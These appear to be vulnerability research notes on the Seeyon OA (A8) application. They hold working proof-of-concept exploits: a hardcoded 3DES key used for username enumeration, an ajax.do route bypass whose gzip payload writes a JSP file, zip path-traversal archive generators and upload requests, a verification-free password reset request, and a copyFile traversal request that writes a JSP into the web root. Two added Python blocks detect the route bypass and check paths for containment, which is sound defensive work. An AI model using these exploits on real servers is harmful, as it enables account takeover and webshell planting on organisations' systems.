Username enumeration
/seeyon/rest/password/retrieve/send/username
Whether a user exists can be enumerated through this binding endpoint.
Higher versions use encrypted transport; change the request to POST + JSON:
/seeyon/rest/password/retrieve/send {"loginName":"gJ90ikKmIGY="}
Encryption algorithm:
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESedeKeySpec;
import javax.crypto.spec.IvParameterSpec;
import java.security.Key;

public class Main {
    public static void main(String[] args) {
        String pass = "sysadmin";
        try {
            // Fixed 3DES key and IV used by the client-side encryption
            DESedeKeySpec spec = new DESedeKeySpec("m1yanfa@seeyon.com119$#M1#$".getBytes());
            SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("desede");
            Key deskey = keyFactory.generateSecret(spec);
            Cipher cipher = Cipher.getInstance("desede/CBC/PKCS5Padding");
            IvParameterSpec ips = new IvParameterSpec("01234567".getBytes());
            cipher.init(Cipher.ENCRYPT_MODE, deskey, ips);
            byte[] secData = cipher.doFinal(pass.getBytes());
            String enData = Base64.getEncoder().encodeToString(secData);
            System.out.println(enData);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
ajax.do authorization bypass
Reference analysis: 某OA ajax.do处漏洞分析 (analysis of the ajax.do vulnerability in a certain OA)
A common vulnerability in lower versions: a parsing discrepancy is used to bypass the route restriction. The article uses the autoinstall.do route for the bypass.
PoC:
Generate the gzip data:
import com.seeyon.ctp.common.excel.DataRecord;
import com.seeyon.ctp.common.log.CtpLogFactory;
import com.seeyon.ctp.util.ZipUtil;
import com.seeyon.ctp.util.json.JSONUtil;
import org.apache.commons.logging.Log;
import java.net.URLEncoder;
import java.util.ArrayList;

public class fileToExcelManagerPayload {
    private static final Log LOGGER = CtpLogFactory.getLog(fileToExcelManagerPayload.class);

    public static void main(String[] args) {
        DataRecord d = new DataRecord();
        String[] c = {"\"\r\n" + "<% out.println(\"ttttttttt\"); %>" + "\"\r\n"};
        d.setColumnName(c);
        final ArrayList<Object> list = new ArrayList<>();
        list.add("../webapps/ROOT/x.jsp");
        list.add("\"\"");
        list.add(d);
        final String list1 = JSONUtil.toJSONString(list);
        // Same gzip + URL encoding that the arguments parameter expects
        String strArgs = ZipUtil.compressResponse(list1, "gzip", "UTF-8", LOGGER);
        System.out.println(URLEncoder.encode(strArgs));
        System.out.println("end");
    }
}
Request:
POST /seeyon/autoinstall.do/../ajax.do?method=ajaxAction&managerName=fileToExcelManager HTTP/1.1
Host: xxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 6357

managerMethod=saveExcelInBase&managerName=fileToExcelManager&method=ajaxAction&requestCompress=gzip&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%5D%C2%8D%C3%81%0A%C3%820%10D%7F%C2%A5%2C%14%14B%C3%A2%C2%B9%C2%8A%C3%A7%1E%C3%84%C2%82%14%3C4%3D%C2%A46%C3%98H%C2%9A%C2%84dC%05%C3%B1%C3%9FM%09zp%C3%B64%C2%8F%C3%A5M%07%C2%94%C2%B2E%0E%C3%82%C2%B9%C3%80.M%C3%93%C2%B2%27%7D%04%07%04x%3A+%2F%C2%B8Y%1Dgs%16%C2%B3%C2%84%C2%AA%5B%C2%A9%C3%A7%C3%A6P%166%22u%5E%19%C3%94f%C3%83%01%C2%BF%C3%A1%C2%B0%C3%9D%17%C3%A51%C2%BFAO%60%14%28j%29%C3%86%C2%93%0A%C2%98%04%C2%89d%C3%A1U%C3%A1%04%C2%95%C2%89Z%13%08%C2%93%C2%94%C2%98%172%40%C2%85%C3%BAWB%1C%C3%9A%C2%BF%5EKu%C2%9F%C2%92nG%C3%80%C3%9Be%C3%95%C2%BE%C3%BB%0F%C3%8BJZ%C2%B7%C3%8A%00%00%00
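As an added example (not part of the original notes), a detector for the route bypass above: it normalizes the request path the way the servlet container does and flags a request only when the normalized path reaches ajax.do while the raw path did not. The access-log lines are constructed and the sensitive-servlet set is an assumption.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Servlets that must only be reached by their direct path (assumed list).
SENSITIVE = {"/seeyon/ajax.do"}

def normalized_path(raw_target):
    """Decode the path and collapse '.'/'..' segments as the container will."""
    return posixpath.normpath(unquote(urlsplit(raw_target).path))

def is_route_bypass(raw_target):
    """True when a sensitive servlet is reached only after normalization."""
    raw_path = urlsplit(raw_target).path
    norm = normalized_path(raw_target)
    return norm in SENSITIVE and raw_path != norm

def scan_access_log(lines):
    """Return (client_ip, request_target) for each combined-log line that bypasses."""
    hits = []
    for line in lines:
        quoted = line.split('"')
        if len(quoted) < 2:
            continue
        request = quoted[1].split()      # ['POST', '/seeyon/...', 'HTTP/1.1']
        if len(request) >= 2 and is_route_bypass(request[1]):
            hits.append((line.split()[0], request[1]))
    return hits

# Constructed sample access-log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jan/2024:10:00:01 +0800] "POST /seeyon/autoinstall.do/../ajax.do?method=ajaxAction&managerName=fileToExcelManager HTTP/1.1" 200 512',
    '10.0.0.6 - - [08/Jan/2024:10:00:02 +0800] "POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager HTTP/1.1" 403 0',
    '10.0.0.7 - - [08/Jan/2024:10:00:03 +0800] "GET /seeyon/main/../main.do HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, target in scan_access_log(SAMPLE_LOG):
        print(f"route bypass from {ip}: {target}")
```

Direct requests to ajax.do and dot-segment paths that land on unrestricted servlets are left alone, so the rule only fires on the discrepancy itself.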
Backend archive extraction
The principle is the same in every case: a low-privilege user uploads a zip, and a directory traversal during extraction writes a JSP.
Unlike the OFD one, this completes in a single step and uses a different interface.
Constructing the upload request:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<h1>uploadFile</h1>
<form action="http://192.168.203.25/seeyon/workflow/cie.do?method=importProcess" method="post" enctype="multipart/form-data">
    <p><input type="file" name="file"></p>
    <p><input type="submit" value="submit"></p>
</form>
</body>
</html>
Generating the archive:
import zipfile

if __name__ == "__main__":
    file = "h1.jsp"
    try:
        with open(file, "r") as f:
            binary = f.read()
        zipFile = zipfile.ZipFile("t2.zip", "a", zipfile.ZIP_DEFLATED)
        # Entry name carries the traversal; zipfile writes it verbatim
        zipFile.writestr("..\\..\\webapps\\ROOT\\bak1.jsp", binary)
        zipFile.close()
    except IOError as e:
        raise e
Lower-version interface: cie.do
PoC:
POST /seeyon/workflow/cie.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close

------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip

zip data
------WebKitFormBoundaryG4m3BNZiXbTVIltz--
Higher-version interface: designer.do
PoC:
POST /seeyon/workflow/designer.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close

------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip

zip data
------WebKitFormBoundaryG4m3BNZiXbTVIltz--
User password reset
An old bug: bypass the verification code to reset a password.
PoC:
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 192.168.136.55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 45
Content-Type: application/json
Accept-Encoding: gzip

{"loginName": "test","password":"1qaz@WSX"}
Backend file upload points
All of them filter jsp, so they have to be used together with the encryption feature.
Calling save stores an id, which can be chained with the OFD one; some of the others only upload.
save upload, stored under base/upload/2024/01/01/id:
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"

true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"

resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"

0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"

false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"

0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.zip"
Content-Type: text/plain

111
--59229605f98b8cf290a7b8908b34616b--
Plain upload, stored under base/upload/2024/01/01/id:
POST /seeyon/fileUpload.do?method=processUpload&type=1&applicationCategory=1&extensions=jpg,gif,jpeg,png&maxSize=5242880&callback=imgUploadCallBack&closeWindow=false&serverTime=true HTTP/1.1
Host: 192.168.144.1
Content-Length: 199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDmqbiz5fkZYKfWPI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224
Connection: close

------WebKitFormBoundaryDmqbiz5fkZYKfWPI
Content-Disposition: form-data; name="upload"; filename="image.gif"
Content-Type: image/gif

gif89a achaeaf
------WebKitFormBoundaryDmqbiz5fkZYKfWPI--
save upload, stored under base/resources/portal/css/id:
POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=57507 HTTP/1.1
Accept: */*
Host: 192.168.1.11
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C4046122
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

arguments=%5B%22aaaaa%22%5D&managerMethod=generateCssFileByCssStr
OFD extraction vulnerability
Requires ordinary user privileges; it is essentially a directory traversal during zip extraction. Largely fixed in v8 and above.
The upload still goes through the old interface.
After uploading, get the id: search the response for fileurls=fileurls; what follows is the id.
Extraction interface:
POST /seeyon/ajax.do;Jsessionid=a?method=ajaxAction&managerName=govdocGBManager&rnd=29981 HTTP/1.1
Accept: */*
CSRFTOKEN:
Host: 192.168.246.4
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

arguments=["-7373142480696292225"]&managerMethod=getOfdMetadata
This interface can also be tried; there is little difference:
GET /seeyon/content/content.do?method=invokingForm&extensions=zip&isNew=1&ofdFileId=-3217079395985044654&subApp=2 HTTP/1.1
Accept: */*
Host: 192.168.246.4
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN
Accept-Encoding: gzip, deflate
Copy file
Copies a file to a new location; allows directory traversal and changing the extension.
POST /seeyon/ajax.do?method=ajaxAction&managerName=cipSynSchemeManager&rnd=29981 HTTP/1.1
Accept: */*
Host: 192.168.1.11
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224;
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

arguments=["../../../../upload/2024/01/08/-3156853247588808973","../../ApacheJetspeed/webapps/ROOT/1234.jsp"]&managerMethod=copyFile
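As an added example (not from the original notes), the containment check a defender would want in both the archive-extraction handlers above (cie.do/designer.do and the OFD one) and in copyFile: every archive entry or copy argument is resolved against its intended base directory before the filesystem is touched, and backslashes like the '..\\..\\' names in the archive generator are treated as separators too. The base path and the blocked extensions are assumptions.

```python
import io
import zipfile
from pathlib import PurePosixPath

UPLOAD_BASE = PurePosixPath("/opt/A8/base/upload")   # assumed install layout
SCRIPT_EXT = {".jsp", ".jspx"}                      # never accepted as a copy target

def contained_path(base, relative):
    """Resolve relative under base; None if it is absolute or climbs out of base."""
    if relative.startswith(("/", "\\")):
        return None
    parts = []
    # Backslashes count as separators: the archive generator above uses '..\\..\\'.
    for seg in relative.replace("\\", "/").split("/"):
        if seg == "..":
            if not parts:        # would step above base
                return None
            parts.pop()
        elif seg not in ("", "."):
            parts.append(seg)
    return base.joinpath(*parts)

def safe_zip_entries(data, base):
    """List (entry, destination) for an archive, refusing the first escaping entry."""
    out = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            dest = contained_path(base, info.filename)
            if dest is None:
                raise ValueError(f"zip entry escapes {base}: {info.filename!r}")
            out.append((info.filename, str(dest)))
    return out

def check_copy(src_rel, dst_rel, base):
    """Validate copyFile-style arguments: both inside base, no script extension."""
    src, dst = contained_path(base, src_rel), contained_path(base, dst_rel)
    if src is None or dst is None:
        raise ValueError("copyFile argument escapes base")
    if dst.suffix.lower() in SCRIPT_EXT:
        raise ValueError(f"refusing script extension {dst.suffix}")
    return str(src), str(dst)

def build_zip(entries):
    """Constructed test archive (not a captured file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()
```

Checking the destination rather than the entry string is what matters: a name is only rejected when it would resolve outside the base, so "a/../b" inside the upload tree still passes while the two copyFile arguments above do not.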
A8 installation
Start the s1 agent first, then start the A8 service from the web page.
To enable remote debugging, add the line SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 to ApacheJetspeed\bin\startup.bat, then restart the A8 service.